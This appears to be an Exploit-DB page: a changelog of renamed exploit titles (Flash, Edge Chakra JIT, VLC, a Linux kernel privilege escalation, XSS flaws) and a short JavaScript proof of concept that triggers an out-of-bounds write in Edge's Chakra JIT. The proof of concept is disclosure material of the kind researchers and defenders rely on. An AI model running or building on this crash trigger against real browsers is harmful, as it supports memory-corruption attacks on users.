
8 changes to exploits/shellcodes

Adobe Flash Player 10.0.22 and AIR - 'intf_count' Integer Overflow
Adobe Flash Player 10.0.22 / AIR - 'intf_count' Integer Overflow
Microsoft Edge Chakra JIT - Out-of-Bounds Reads/Writes
Microsoft Edge Chakra JIT - BoundFunction::NewInstance Out-of-Bounds Read
Microsoft Edge Chakra JIT - Type Confusion with Hoisted SetConcatStrMultiItemBE Instructions
VLC media player 2.2.8 - Arbitrary Code Execution (PoC)
Linux Kernel < 4.13.9 (Ubuntu 16.04/Fedora 27) - Local Privilege Escalation
212Cafe Board - Multiple Cross-Site Scripting Vulnerabilities
212Cafe Board 0.08 Beta / 6.30 Beta - Multiple Cross-Site Scripting Vulnerabilities
123 Flash Chat - Multiple Vulnerabilities
123 Flash Chat 7.8 - Multiple Vulnerabilities
Dicoogle PACS 2.5.0 - Directory Traversal
15 lines
No EOL
325 B
JavaScript
/*
It seems that this issue is similar to the issue 1429 (MSRC 42111). It might need to refresh the page several times to observe a crash.

PoC:
*/

let arr = new Uint32Array(1000);
for (let i = 0; i < 0x1000000; i++) {
    for (let j = 0; j < 1; j++) {
        i--;
        i++;
    }

    arr[i] = 0x1234;
}